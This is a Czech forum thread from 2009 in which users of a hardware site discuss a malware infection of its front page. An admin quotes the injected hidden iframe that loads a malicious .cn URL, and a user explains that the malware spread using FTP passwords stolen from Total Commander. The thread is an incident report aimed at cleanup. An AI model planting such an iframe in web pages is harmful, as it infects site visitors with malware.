Stránka 1 z 2
virus na hlavní stránce
Napsal: sob dub 18, 2009 2:08 pm
od Wolfik
tak nevím jestli je chyba ve mně nebo máte problémy vy
každopádně jdu proskenovat PC
Napsal: sob dub 18, 2009 2:21 pm
od -HoNY-
Kaspersky mi hlásí jakýsi liteautogreatest.cn
Napsal: sob dub 18, 2009 2:33 pm
od no-X
Koukám na to, několik html souborů bylo k dnešnímu datu v 7:45-7:47 změněno
Zkusím najít zálohu a přepsat je původními verzemi.
//ed: přepsáno v 14:35
//ed2: vypadá to, že se to stalo docela dost webům... hmm...
Napsal: sob dub 18, 2009 2:47 pm
od Bob van Sikorski
už jsem taky na nějaký web narazil, kde avast houkal ohledně jakéhosi zazipovaného iframe.
Napsal: sob dub 18, 2009 2:52 pm
od no-X
Konkrétně bylo hned na začátek /body/ přidáno:
Kód: Vybrat vše
<iframe src="http://hotslotpot.cn/in.cgi?income66" width=1 height=1 style="visibility: hidden"></iframe>
A to u všech souborů, které mají v názvu "index" nebo "main". A to i takových, které byly přejmenované z důvodu zálohy (např. index_.html), takže nemohly být nalezeny přes nějaký link. Hmm...
RE
Napsal: pon dub 20, 2009 3:52 pm
od Vykupitel
Vyřešeno, ale všem co mají FTP přístup na 3dfx.cz a používají Total Commander, tak do verze 7.04 se používá slabé šifrování na FTP hesla a ten vir je ze souboru krade a pomocí nich se dál šíří. Prosím zkontrolujte i jiné weby co máte ve správě.
Napsal: pon dub 20, 2009 5:08 pm
od Wolfik
a kde se to tam vzalo?
Napsal: pon dub 20, 2009 6:21 pm
od no-X
Nejsem si jistý, jestli přenosem od někoho z lidí, co mají na ftp přístup. Protože ten a předchozí den to nakazilo hromadu webů po celé ČR. A v sobotu večer jsem postřehl, že všechny html soubory byly aktualizované, ale nebyl to vir, obsah zůstal nezměněný. Odhadoval bych to na čistku ze strany hostingu(?)
Napsal: pon dub 20, 2009 7:10 pm
od Rendax
Nebo to má na svědomí OBR či pán 28-mi centimetrů?
Napsal: pon dub 20, 2009 7:15 pm
od no-X
ee, vkládá to odkaz na nějaký zavirovaný web v doméně .cn
Napsal: pon dub 20, 2009 8:03 pm
od socket
cize OBRov kamarat?
Napsal: pon dub 20, 2009 9:25 pm
od no-X
Myslíš ukrajince, nebo ty nepřizpůsobivé spoluobčany, na kraji jejichž ghetta bydlí?
Napsal: pon dub 20, 2009 9:26 pm
od socket
OBR ma kamaraty vsade, ktori mu posielaju "virtualne" samply
Napsal: pon dub 20, 2009 9:29 pm
od no-X
Jo ty myslíš tyhle... No to pak ještě nezapomínej na ty, které za něj dělají ty testy, pod které se podepisuje (a kteří se asi množí podélným dělením, protože jejich počet v poslední době nějak narostl)
Napsal: úte dub 21, 2009 7:23 pm
od -HoNY-
no-X píše:Jo ty myslíš tyhle... No to pak ještě nezapomínej na ty, které za něj dělají ty testy, pod které se podepisuje (a kteří se asi množí podélným dělením, protože jejich počet v poslední době nějak narostl)
Jirko! Zapomínáš na
komplex méněcennosti – i když má víc spolupracovníků, než je kvalitních redaktorů v České republice, pořád to bude málo.
Napsal: stř dub 22, 2009 10:15 am
od Bob van Sikorski
Napsal: čtv dub 23, 2009 10:41 am
od -HoNY-
Je toto výsledek opravy? Ještě včera mi to nedělalo.
Napsal: čtv dub 23, 2009 11:13 am
od no-X
Neee, to je Rendaxovým avatarem. Má ho na ftpku pod heslem
Pošlu mu SZ, pokud neopraví, budu ho muset smazat...
Napsal: čtv dub 23, 2009 1:13 pm
od wolf00
předpokládam že včera probíhala udržba fora,psalo mi to hlášku že se nejde napojit na databáze
Napsal: čtv dub 23, 2009 1:34 pm
od socket
nejdu menit avatary a to som si ho uz chcel dat